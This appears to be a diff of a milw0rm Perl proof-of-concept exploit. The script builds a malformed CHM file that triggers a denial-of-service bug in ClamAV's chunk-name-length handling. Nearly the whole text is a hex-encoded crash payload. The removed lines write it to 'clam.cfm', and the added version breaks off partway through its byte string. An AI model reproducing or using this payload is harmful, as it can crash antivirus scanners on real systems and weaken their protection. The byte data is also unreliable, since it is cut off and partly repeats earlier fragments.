-"\x69\x6D\x67\x2F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x5F\x6C\x6F\x67\x69\x6E\x2E\x6A\x70\x67\x01\xC2". -"\x97\x37\xCB\x6F\x1A\x2F\x69\x6D\x67\x2F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x5F\x6F\x70\x74\x69\x6F". -"\x6E\x73\x2E\x6A\x70\x67\x01\xC2\xE3\x26\x81\x89\x42\x13\x2F\x69\x6D\x67\x2F\x78\x70\x66\x69\x72\x65". -"\x77\x61\x6C\x6C\x2E\x67\x69\x66\x01\x9C\xD6\x40\xB4\x69\x0A\x2F\x69\x6E\x64\x65\x78\x2E\x68\x74\x6D". -"\x01\x8E\xE3\x4D\x8E\x77\x0D\x2F\x69\x70\x66\x69\x6C\x74\x65\x72\x2E\x68\x74\x6D\x01\x8E\xF2\x44\x9B". -"\x63\x08\x2F\x69\x72\x63\x2E\x68\x74\x6D\x01\x84\xB5\x43\x91\x2A\x09\x2F\x6C\x61\x6E\x67\x2E\x68\x74". -"\x6D\x01\x84\xC6\x6D\xA0\x4B\x0C\x2F\x6C\x69\x6E\x6B\x73\x79\x73\x2E\x68\x74\x6D\x01\x84\xE7\x38\x81". -"\x9A\x2F\x0A\x2F\x6C\x69\x73\x74\x73\x2E\x68\x74\x6D\x01\x8F\xE9\x4D\x8F\x33\x0B\x2F\x6C\x75\x63\x65". -"\x6E\x74\x2E\x68\x74\x6D\x01\x86\x81\x67\x9C\x5D\x0A\x2F\x70\x6F\x72\x74\x73\x2E\x68\x74\x6D\x01\x86". -"\x9E\x44\xE0\x3D\x14\x2F\x70\x72\x65\x66\x5F\x63\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x2E\x68\x74\x6D". -"\x01\x86\xFF\x01\xC7\x4E\x0D\x2F\x70\x72\x65\x66\x5F\x64\x69\x72\x2E\x68\x74\x6D\x01\x87\xC6\x4F\xA5". -"\x05\x11\x2F\x70\x72\x65\x66\x5F\x64\x69\x73\x70\x6C\x61\x79\x2E\x68\x74\x6D\x01\x8F\xF9\x00\x9D\x4C". -"\x12\x2F\x70\x72\x65\x66\x5F\x65\x78\x74\x65\x6E\x64\x65\x64\x2E\x68\x74\x6D\x01\x87\xEB\x54\xB9\x40". -"\x0F\x2F\x70\x72\x65\x66\x5F\x66\x69\x6C\x65\x73\x2E\x68\x74\x6D\x01\x88\xA5\x14\xBD\x59\x11\x2F\x70". -"\x72\x65\x66\x5F\x67\x65\x6E\x65\x72\x61\x6C\x2E\x68\x74\x6D\x01\x88\xE2\x6D\xBA\x3D\x0D\x2F\x70\x72". -"\x65\x66\x5F\x69\x72\x63\x2E\x68\x74\x6D\x01\x89\x9D\x2A\x96\x63\x0F\x2F\x70\x72\x65\x66\x5F\x6E\x6F". -"\x74\x65\x73\x2E\x68\x74\x6D\x01\x89\xB4\x0D\x97\x55\x11\x2F\x70\x72\x65\x66\x5F\x70\x72\x65\x66\x69". -"\x6E\x69\x2E\x68\x74\x6D\x01\x91\xA8\x7E\x97\x18\x0F\x2F\x70\x72\x65\x66\x5F\x70\x72\x6F\x78\x79\x2E". -"\x68\x74\x6D\x01\x91\xC0\x16\xB2\x26\x13\x2F\x70\x72\x65\x66\x5F\x73\x63\x68\x65\x64\x75\x6C\x65\x72". 
-"\x2E\x68\x74\x6D\x01\x91\xF2\x3C\xB5\x69\x12\x2F\x70\x72\x65\x66\x5F\x73\x65\x63\x75\x72\x69\x74\x79". -"\x2E\x68\x74\x6D\x01\x8F\x8E\x27\xA8\x7B\x10\x2F\x70\x72\x65\x66\x5F\x73\x65\x72\x76\x65\x72\x2E\x68". -"\x74\x6D\x01\x89\xCB\x62\xAC\x1C\x0F\x2F\x70\x72\x65\x66\x5F\x73\x74\x61\x74\x73\x2E\x68\x74\x6D\x01". -"\x89\xF7\x7E\x9A\x4E\x13\x2F\x70\x72\x65\x66\x5F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x2E\x68\x74\x6D". -"\x01\x90\x96\x4C\xA5\x52\x0C\x2F\x70\x72\x65\x76\x69\x65\x77\x2E\x68\x74\x6D\x01\x8A\x92\x4C\x95\x3C". -"\x0D\x2F\x70\x72\x6F\x67\x72\x65\x73\x73\x2E\x68\x74\x6D\x01\x8A\xA8\x08\xAC\x40\x0E\x2F\x71\x75\x65". -"\x75\x65\x72\x61\x6E\x6B\x2E\x68\x74\x6D\x01\x8A\xD4\x48\x89\x19\x0B\x2F\x72\x61\x74\x69\x6E\x67\x2E". -"\x68\x74\x6D\x01\x8A\xDD\x61\xAB\x3E\x0C\x2F\x72\x6F\x75\x74\x65\x72\x73\x2E\x68\x74\x6D\x01\x8B\x89". -"\x1F\x9A\x1E\x0C\x2F\x73\x65\x63\x68\x61\x73\x68\x2E\x68\x74\x6D\x01\x92\xF0\x24\xA8\x7D\x0E\x2F\x73". -"\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x68\x74\x6D\x01\x8B\xA3\x3D\x8E\x5D\x0F\x2F\x53\x4D\x43\x37\x30". -"\x30\x34\x41\x42\x52\x2E\x68\x74\x6D\x01\x8B\xB2\x1A\x82\x83\x32\x0C\x2F\x73\x6F\x6C\x77\x69\x73\x65". -"\x2E\x68\x74\x6D\x01\x8D\xB5\x4C\xA2\x09\x0B\x2F\x73\x6F\x75\x72\x63\x65\x2E\x68\x74\x6D\x01\x8D\xD7". -"\x55\x95\x28\x0A\x2F\x73\x74\x61\x72\x74\x2E\x68\x74\x6D\x01\x8D\xEC\x7D\xAF\x0C\x16\x2F\x54\x61\x62". -"\x6C\x65\x20\x6F\x66\x20\x43\x6F\x6E\x74\x65\x6E\x74\x73\x2E\x68\x68\x63\x01\x93\x99\x21\xC8\x6D\x0A". -"\x2F\x74\x6F\x6F\x6C\x73\x2E\x68\x74\x6D\x01\x8E\x9C\x09\xA5\x6D\x14\x2F\x74\x72\x6F\x75\x62\x6C\x65". -"\x73\x68\x6F\x6F\x74\x69\x6E\x67\x2E\x68\x74\x6D\x01\x92\xA8\x25\xC7\x7F\x12\x2F\x75\x70\x64\x61\x74". -"\x65\x5F\x73\x65\x72\x76\x65\x72\x2E\x68\x74\x6D\x01\x8E\xC1\x76\xA1\x57\x0F\x2F\x75\x73\x65\x64\x5F". -"\x66\x69\x6C\x65\x73\x2E\x68\x74\x6D\x01\x90\xD2\x57\xD6\x27\x0E\x2F\x77\x65\x62\x73\x65\x72\x76\x65". -"\x72\x2E\x68\x74\x6D\x01\x90\xBC\x1E\x96\x39\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
-"\x00\x00\x00\x3A\x0F\xD6\x0E\x72\x0E\x06\x0E\x8E\x0D\x1D\x0D\xB3\x0C\x5B\x0C\xD9\x0B\x60\x0B\xDD\x0A". -"\x48\x0A\xC8\x09\x4B\x09\xAD\x08\x1E\x08\x88\x07\x04\x07\x80\x06\xFF\x05\x7E\x05\xE2\x04\x4D\x04\xD1". -"\x03\x59\x03\xCE\x02\x45\x02\x98\x01\x47\x01\xE8\x00\x8D\x00\xD7\x00\x07\x00\x50\x4D\x47\x49\xDF\x0F". -"\x00\x00\x01\x2F\x00\x14\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x4E\x61\x6D\x65\x4C\x69\x73". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; - -open FILE, ">clam.cfm" or die; -binmode(FILE); -print FILE $clam; -close FILE; - -# milw0rm.com [2006-10-17] +#!/usr/bin/perl +# +# Clam AntiVirus ClamAV CHM Chunk Name Length DoS Vulnerability +# Took Damian Put's poc and shortened it just a little. +# All credits to Damian Put (pucik[at]gazeta.pl) (pucik[@]overflow.pl) www.overflow.pl +# /str0ke + +my $clam = +"\x49\x54\x53\x46\x03\x00\x00\x00\x60\x00\x00\x00\x01\x00\x00\x00\x4E\x77\xBC\x98\x15\x04\x00\x00\x10". +"\xFD\x01\x7C\xAA\x7B\xD0\x11\x9E\x0C\x00\xA0\xC9\x22\xE6\xEC\x11\xFD\x01\x7C\xAA\x7B\xD0\x11\x9E\x0C". +"\x00\xA0\xC9\x22\xE6\xEC\x60\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00". +"\x00\x00\x00\x00\x00\x54\x30\x00\x00\x00\x00\x00\x00\xCC\x30\x00\x00\x00\x00\x00\x00\xFE\x01\x00\x00". +"\x00\x00\x00\x00\xEB\x19\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x54\x53\x50\x01". +"\x00\x00\x00\x54\x00\x00\x00\x0A\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\x00". +"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF\x03\x00\x00\x00\x09\x04\x00\x00\x6A\x92\x02". +"\x5D\x2E\x21\xD0\x11\x9D\xF9\x00\xA0\xC9\x22\xE6\xEC\x54\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF". +"\xFF\xFF\xFF\xFF\x50\x4D\x47\x4C\x53\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x01\xFF\xFF\xFF\x01". +"\x2F\x00\x00\x00\xFF\xC0\xFF\xFF\x44\x58\x48\x44\x52\x01\xCE\xB0\x02\xA0\x00\x08\x2F\x23\x49\x54\x42". 
+"\x49\x54\x53\x00\x00\x00\x09\x2F\x23\x53\x54\x52\x49\x4E\x47\x53\x01\xCE\xE6\x6B\x8E\x5F\x08\x2F\x23". +"\x53\x59\x53\x54\x45\x4D\x00\x83\x6E\x7F\x08\x2F\x23\x54\x4F\x50\x49\x43\x53\x01\xCE\xD0\x02\x87\x10". +"\x08\x2F\x23\x55\x52\x4C\x53\x54\x52\x01\xCE\xDC\x3E\x8A\x08\x2F\x23\x55\x52\x4C\x54\x42\x4C\x01\xCE". +"\xD7\x12\x85\x2C\x09\x2F\x23\x57\x49\x4E\x44\x4F\x57\x53\x01\xC8\x93\x78\x81\x44\x0B\x2F\x24\x46\x49". +"\x66\x74\x69\x4D\x61\x69\x6E\x01\xC8\xAA\x2B\x86\x85\x57\x09\x2F\x24\x4F\x42\x4A\x49\x4E\x53\x54\x01". +"\x77\x69\x73\x65\x2E\x68\x74\x6D\x01\x8D\xB5\x4C\xA2\x09\x0B\x2F\x73\x6F\x75\x72\x63\x65\x2E\x68\x74". +"\x6D\x01\x8D\xD7\x55\x95\x28\x0A\x2F\x73\x74\x61\x72\x74\x2E\x68\x74\x6D\x01\x8D\xEC\x7D\xAF\x0C\x16". +"\x2F\x54\x61\x62\x6C\x65\x20\x6F\x66\x20\x43\x6F\x6E\x74\x65\x6E\x74\x73\x2E\x68\x68\x63\x01\x93\x99". +"\x21\xC8\x6D\x0A\x2F\x74\x6F\x6F\x6C\x73\x2E\x68\x74\x6D\x01\x8E\x9C\x09\xA5\x6D\x14\x2F\x74\x72\x6F". +"\x75\x62\x6C\x65\x73\x68\x6F\x6F\x74\x69\x6E\x67\x2E\x68\x74\x6D\x01\x92\xA8\x25\xC7\x7F\x12\x2F\x75". +"\x70\x64\x61\x74\x65\x5F\x73\x65\x72\x76\x65\x72\x2E\x68\x74\x6D\x01\x8E\xC1\x76\xA1\x57\x0F\x2F\x75". +"\x73\x65\x64\x5F\x66\x69\x6C\x65\x73\x2E\x68\x74\x6D\x01\x90\xD2\x57\xD6\x27\x0E\x2F\x77\x65\x62\x73". +"\x65\x72\x76\x65\x72\x2E\x68\x74\x6D\x01\x90\xBC\x1E\x96\x39\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x3A\x0F\xD6\x0E\x72\x0E\x06\x0E\x8E\x0D\x1D\x0D\xB3\x0C\x5B\x0C\xD9\x0B". +"\x60\x0B\xDD\x0A\x48\x0A\xC8\x09\x4B\x09\xAD\x08\x1E\x08\x88\x07\x04\x07\x80\x06\xFF\x05\x7E\x05\xE2". +"\x04\x4D\x04\xD1\x03\x59\x03\xCE\x02\x45\x02\x98\x01\x47\x01\xE8\x00\x8D\x00\x3D\x00\xA4\x00\x50\x4D". +"\x47\x4C\x43\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x14\x3A\x3A\x44\x61\x74\x61". +"\x53\x70\x61\x63\x65\x2F\x4E\x61\x6D\x65\x4C\x69\x73\x74\x00\x00\x3C\x28\x3A\x3A\x44\x61\x74\x61\x53". +"\x70\x61\x63\x65\x2F\x53\x74\x6F\x72\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64". 
+"\x2F\x43\x6F\x6E\x74\x65\x6E\x74\x00\x84\x6D\xB3\xCD\x32\x2C\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63". +"\x65\x2F\x53\x74\x6F\x72\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x43\x6F". +"\x6E\x74\x72\x6F\x6C\x44\x61\x74\x61\x00\x6A\x1C\x29\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F". +"\x53\x74\x6F\x72\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x53\x70\x61\x6E". +"\x49\x6E\x66\x6F\x00\x62\x08\x2F\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x53\x74\x6F\x72\x61". +"\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D". +"\x2F\x4C\x69\x73\x74\x00\x3C\x26\x5F\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x53\x74\x6F\x72". +"\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72". +"\x6D\x2F\x7B\x37\x46\x43\x32\x38\x39\x34\x30\x2D\x39\x44\x33\x31\x2D\x31\x31\x44\x30\x2D\x39\x42\x32". +"\x37\x2D\x30\x30\x41\x30\x43\x39\x31\x45\x39\x43\x37\x43\x7D\x2F\x49\x6E\x73\x74\x61\x6E\x63\x65\x44". +"\x61\x74\x61\x2F\x00\x00\x00\x69\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x53\x74\x6F\x72\x61". +"\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D". +"\x2F\x7B\x37\x46\x43\x32\x38\x39\x34\x30\x2D\x39\x44\x33\x31\x2D\x31\x31\x44\x30\x2D\x39\x42\x32\x37". +"\x2D\x30\x30\x41\x30\x43\x39\x31\x45\x39\x43\x37\x43\x7D\x2F\x49\x6E\x73\x74\x61\x6E\x63\x65\x44\x61". +"\x74\x61\x2F\x52\x65\x73\x65\x74\x54\x61\x62\x6C\x65\x00\x81\x06\x82\x68\x65\x72\x76\x65\x72\x2E\x6A". +"\x70\x67\x01\xBC\xBB\x6B\x9F\x59\x1F\x2F\x69\x6D\x67\x2F\x32\x32\x62\x5F\x65\x6E\x5F\x73\x65\x72\x76". +"\x65\x72\x5F\x70\x72\x69\x6F\x72\x69\x74\x79\x2E\x6A\x70\x67\x01\xAE\xE3\x7F\xFE\x1E\x20\x2F\x69\x6D". +"\x67\x2F\x32\x32\x62\x5F\x65\x6E\x5F\x75\x70\x64\x61\x74\x65\x5F\x73\x65\x72\x76\x65\x72\x6D\x65\x74". +"\x2E\x6A\x70\x67\x01\x95\x9B\x4B\x97\x7E\x1B\x2F\x69\x6D\x67\x2F\x32\x35\x61\x5F\x63\x6F\x6E\x74\x65". 
+"\x78\x74\x5F\x73\x6F\x75\x72\x63\x65\x2E\x6A\x70\x67\x01\x96\x89\x38\xB7\x30\x17\x2F\x69\x6D\x67\x2F". +"\x32\x35\x61\x5F\x71\x75\x65\x75\x65\x5F\x6C\x69\x73\x74\x2E\x6A\x70\x67\x01\xB1\xD9\x01\xF4\x37\x23". +"\x2F\x69\x6D\x67\x2F\x32\x35\x62\x5F\x70\x72\x65\x66\x5F\x73\x65\x72\x76\x65\x72\x5F\x6C\x69\x73\x74". +"\x62\x75\x74\x74\x6F\x6E\x2E\x6A\x70\x67\x01\xAE\xD9\x75\x8A\x0A\x10\x2F\x69\x6D\x67\x2F\x61\x64\x64". +"\x72\x65\x6D\x31\x2E\x67\x69\x66\x01\x99\xF0\x34\x81\x98\x4D\x10\x2F\x69\x6D\x67\x2F\x61\x64\x64\x72". +"\x65\x6D\x32\x2E\x67\x69\x66\x01\x9B\x89\x01\xFF\x6E\x0E\x2F\x69\x6D\x67\x2F\x61\x72\x72\x6F\x77\x2E". +"\x67\x69\x66\x01\xC0\xAF\x70\x3E\x15\x2F\x69\x6D\x67\x2F\x62\x61\x72\x5F\x6F\x62\x74\x61\x69\x6E\x65". +"\x64\x2E\x6A\x70\x67\x01\xB1\xC5\x59\x89\x76\x18\x2F\x69\x6D\x67\x2F\x62\x61\x72\x5F\x73\x68\x61\x72". +"\x65\x64\x66\x69\x6C\x65\x73\x2E\x6A\x70\x67\x01\xB1\xCF\x4F\x89\x32\x18\x2F\x69\x6D\x67\x2F\x62\x61". +"\x72\x5F\x73\x6F\x75\x72\x63\x65\x5F\x66\x6C\x61\x74\x2E\x6A\x70\x67\x01\xB1\xAA\x10\x8F\x24\x1A\x2F". +"\x69\x6D\x67\x2F\x62\x61\x72\x5F\x73\x6F\x75\x72\x63\x65\x5F\x73\x68\x61\x64\x65\x64\x2E\x6A\x70\x67". +"\x01\xB1\xB9\x34\x8C\x25\x13\x2F\x69\x6D\x67\x2F\x62\x6E\x5F\x63\x6F\x6E\x6E\x65\x63\x74\x2E\x6A\x70". +"\x67\x01\x95\xB3\x49\x89\x2D\x0B\x2F\x69\x6D\x67\x2F\x62\x72\x2E\x6A\x70\x67\x01\xB9\xBB\x07\xBB\x69". +"\x01\xB1\x98\x4F\x91\x41\x1C\x2F\x69\x6D\x67\x2F\x65\x44\x32\x4B\x6C\x69\x6E\x6B\x73\x5F\x75\x6E\x63". +"\x68\x65\x63\x6B\x65\x64\x2E\x6A\x70\x67\x01\x93\xE2\x0E\x8C\x74\x16\x2F\x69\x6D\x67\x2F\x65\x44\x6F". +"\x6E\x6B\x65\x79\x48\x79\x62\x72\x69\x64\x2E\x6A\x70\x67\x01\x97\xE7\x48\x87\x34\x17\x2F\x69\x6D\x67". +"\x2F\x66\x69\x65\x6E\x64\x73\x5F\x63\x6F\x6E\x74\x65\x78\x74\x2E\x6A\x70\x67\x01\x96\xC0\x68\xC6\x09". +"\x69\x6D\x67\x2F\x66\x72\x69\x65\x6E\x64\x73\x33\x2E\x6A\x70\x67\x01\x97\x86\x71\x8A\x1E\x0B\x2F\x69". +"\x6D\x67\x2F\x69\x70\x2E\x67\x69\x66\x01\x9D\x8B\x29\xA5\x2D\x1D\x2F\x69\x6D\x67\x2F\x6C\x69\x6E\x6B". 
+"\x73\x79\x73\x5F\x70\x6F\x72\x74\x5F\x74\x72\x69\x67\x67\x65\x72\x2E\x6A\x70\x67\x01\xA1\xD2\x1E\x82". +"\xEB\x4F\x13\x2F\x69\x6D\x67\x2F\x6C\x69\x73\x74\x5F\x6B\x6E\x6F\x77\x6E\x2E\x6A\x70\x67\x01\xC0\xBD". +"\x4E\x8E\x03\x15\x2F\x69\x6D\x67\x2F\x6C\x69\x73\x74\x5F\x6F\x6E\x71\x75\x65\x75\x65\x2E\x6A\x70\x67". +"\x01\xC0\xB0\x2E\x8D\x20\x14\x2F\x69\x6D\x67\x2F\x6C\x69\x73\x74\x5F\x75\x70\x6C\x6F\x61\x64\x2E\x6A". +"\x70\x67\x01\xC0\xA2\x43\x8D\x2D\x0F\x2F\x69\x6D\x67\x2F\x6D\x6C\x64\x6F\x6E\x6B\x2E\x6A\x70\x67\x01". +"\x97\xDC\x76\x85\x21\x11\x2F\x69\x6D\x67\x2F\x6D\x70\x65\x6E\x64\x69\x6E\x67\x2E\x6A\x70\x67\x01\x97". +"\xC0\x51\x85\x15\x15\x2F\x69\x6D\x67\x2F\x6D\x75\x6C\x65\x5F\x54\x72\x5F\x67\x72\x65\x79\x2E\x6A\x70". +"\x67\x01\x98\xA8\x6E\x85\x16\x16\x2F\x69\x6D\x67\x2F\x6D\x75\x6C\x65\x5F\x54\x72\x5F\x4C\x6F\x77\x49". +"\x44\x2E\x6A\x70\x67\x01\x98\xA0\x10\x88\x5E\x16\x2F\x69\x6D\x67\x2F\x6D\x75\x6C\x65\x5F\x54\x72\x61". +"\x79\x49\x63\x6F\x6E\x2E\x6A\x70\x67\x01\x98\x9A\x69\x85\x27\x10\x2F\x69\x6D\x67\x2F\x6E\x65\x74\x63". +"\x6F\x6E\x73\x2E\x67\x69\x66\x01\x99\xAB\x77\xC4\x3D\x10\x2F\x69\x6D\x67\x2F\x6E\x65\x75\x74\x72\x61". +"\x6C\x2E\x6A\x70\x67\x01\x97\xC5\x66\x85\x08\x15\x2F\x69\x6D\x67\x2F\x6E\x6F\x74\x63\x6F\x6E\x6E\x65". +"\x63\x74\x65\x64\x2E\x6A\x70\x67\x01\x98\x92\x7E\x87\x6B\x0D\x2F\x69\x6D\x67\x2F\x70\x6C\x75\x73\x2E". +"\x6A\x70\x67\x01\x97\xD2\x2E\x85\x1E\x12\x2F\x69\x6D\x67\x2F\x70\x6C\x75\x73\x63\x6F\x6D\x70\x61\x2E". +"\x6A\x70\x67\x01\x97\xD7\x4C\x85\x2A\x1A\x2F\x69\x6D\x67\x2F\x70\x6C\x75\x73\x65\x44\x6F\x6E\x6B\x65". +"\x79\x48\x79\x62\x72\x69\x64\x2E\x6A\x70\x67\x01\x97\xEE\x7C\x85\x2B\x13\x2F\x69\x6D\x67\x2F\x70\x6C". +"\x75\x73\x6D\x6C\x64\x6F\x6E\x6B\x2E\x6A\x70\x67\x01\x97\xE2\x17\x85\x31\x15\x2F\x69\x6D\x67\x2F\x70". +"\x6C\x75\x73\x73\x68\x61\x72\x65\x61\x7A\x61\x2E\x6A\x70\x67\x01\x97\xFE\x09\x8A\x09\x18\x2F\x69\x6D". +"\x67\x2F\x70\x72\x65\x66\x5F\x63\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x2E\x6A\x70\x67\x01\xA4\xBD\x6D". 
+"\x81\x82\x76\x19\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73". +"\x2E\x6A\x70\x67\x01\xA5\xC0\x63\x81\xA9\x2F\x15\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x64\x69\x73". +"\x70\x6C\x61\x79\x2E\x6A\x70\x67\x01\xC0\xCB\x51\xF9\x6D\x16\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F". +"\x65\x78\x74\x65\x6E\x64\x65\x64\x2E\x6A\x70\x67\x01\xA6\xEA\x12\x82\x81\x64\x13\x2F\x69\x6D\x67\x2F". +"\x70\x72\x65\x66\x5F\x66\x69\x6C\x65\x73\x2E\x6A\x70\x67\x01\xA8\xEB\x76\x82\x8E\x42\x15\x2F\x69\x6D". +"\x67\x2F\x70\x72\x65\x66\x5F\x67\x65\x6E\x65\x72\x61\x6C\x2E\x6A\x70\x67\x01\xAA\xFA\x38\xF8\x28\x11". +"\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x69\x72\x63\x2E\x6A\x70\x67\x01\xAB\xF2\x60\x81\x87\x1C\x1B". +"\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x6E\x6F\x74\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x73\x2E\x6A". +"\x70\x67\x01\xAC\xF9\x7C\xE1\x22\x13\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x70\x72\x6F\x78\x79\x2E". +"\x6A\x70\x67\x01\xC3\xEC\x68\xD4\x4B\x17\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x73\x63\x68\x65\x64". +"\x75\x6C\x65\x72\x2E\x6A\x70\x67\x01\xC4\xC1\x33\xEB\x4E\x16\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F". +"\x53\x65\x63\x75\x72\x69\x74\x79\x2E\x6A\x70\x67\x01\xBC\xDB\x44\x81\xD4\x19\x14\x2F\x69\x6D\x67\x2F". +"\x70\x72\x65\x66\x5F\x73\x65\x72\x76\x65\x72\x2E\x6A\x70\x67\x01\xAD\xDB\x1E\xFE\x57\x18\x2F\x69\x6D". +"\x67\x2F\x70\x72\x65\x66\x5F\x73\x74\x61\x74\x69\x73\x74\x69\x63\x73\x2E\x6A\x70\x67\x01\xAF\xE2\x1D". +"\x81\xA4\x57\x17\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x2E\x6A". +"\x70\x67\x01\xC1\xC5\x3E\xD1\x79\x1F\x2F\x69\x6D\x67\x2F\x50\x72\x65\x66\x65\x72\x65\x6E\x63\x65\x73". +"\x5F\x32\x34\x62\x5F\x77\x69\x7A\x61\x72\x64\x2E\x6A\x70\x67\x01\x93\xEF\x02\x81\xAC\x49\x0E\x2F\x69". +"\x6D\x67\x2F\x72\x61\x6E\x67\x65\x2E\x67\x69\x66\x01\xA0\xE0\x32\xF1\x6C\x0F\x2F\x69\x6D\x67\x2F\x52". +"\x61\x74\x69\x6E\x67\x2E\x6A\x70\x67\x01\x98\xAE\x04\x85\x2E\x13\x2F\x69\x6D\x67\x2F\x52\x61\x74\x69". 
+"\x6E\x67\x5F\x62\x61\x64\x2E\x6A\x70\x67\x01\x98\xB3\x32\x85\x49\x15\x2F\x69\x6D\x67\x2F\x73\x65\x63". +"\x75\x72\x65\x5F\x68\x61\x73\x68\x31\x2E\x6A\x70\x67\x01\xC5\xFB\x29\xB2\x58\x15\x2F\x69\x6D\x67\x2F". +"\x73\x65\x63\x75\x72\x65\x5F\x68\x61\x73\x68\x32\x2E\x6A\x70\x67\x01\xC6\xAE\x01\xDA\x3A\x15\x2F\x69". +"\x6D\x67\x2F\x73\x65\x63\x75\x72\x65\x5F\x68\x61\x73\x68\x33\x2E\x6A\x70\x67\x01\xC7\x88\x3B\xC9\x4B". +"\x15\x2F\x69\x6D\x67\x2F\x73\x65\x63\x75\x72\x65\x5F\x68\x61\x73\x68\x34\x2E\x6A\x70\x67\x01\xC7\xD2". +"\x06\xC1\x72\x11\x2F\x69\x6D\x67\x2F\x73\x65\x74\x74\x69\x6E\x67\x31\x2E\x67\x69\x66\x01\x9E\x86\x5C". +"\xCA\x7F\x11\x2F\x69\x6D\x67\x2F\x73\x65\x74\x74\x69\x6E\x67\x32\x2E\x67\x69\x66\x01\x9F\x9C\x53\xDE". +"\x69\x11\x2F\x69\x6D\x67\x2F\x73\x65\x74\x74\x69\x6E\x67\x33\x2E\x67\x69\x66\x01\x9E\xD1\x5B\xCA\x78". +"\x11\x2F\x69\x6D\x67\x2F\x53\x68\x61\x72\x65\x61\x7A\x61\x2E\x6A\x70\x67\x01\x97\xF4\x27\x89\x62\x15". +"\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x31\x2E\x6A\x70\x67\x01\xB2\xCD\x38". +"\x81\xD8\x44\x19\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x32\x5F\x77\x32\x6B". +"\x2E\x6A\x70\x67\x01\xB4\xA5\x7C\x81\xEA\x68\x19\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41". +"\x42\x52\x5F\x32\x5F\x77\x39\x78\x2E\x6A\x70\x67\x01\xB6\x90\x64\x81\xF8\x31\x17\x2F\x69\x6D\x67\x2F". +"\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x33\x2E\x31\x2E\x6A\x70\x67\x01\xB8\x89\x15\xB1\x2B\x17". +"\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x33\x2E\x32\x2E\x6A\x70\x67\x01\xB8". +"\xBA\x40\x81\x80\x47\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x31\x2E\x67\x69\x66\x01". +"\xB9\xF6\x70\xA3\x57\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x32\x2E\x67\x69\x66\x01". +"\xBA\x9A\x47\x9B\x5E\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x33\x2E\x67\x69\x66\x01". +"\xBA\xB6\x25\xA7\x13\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x35\x2E\x67\x69\x66\x01". 
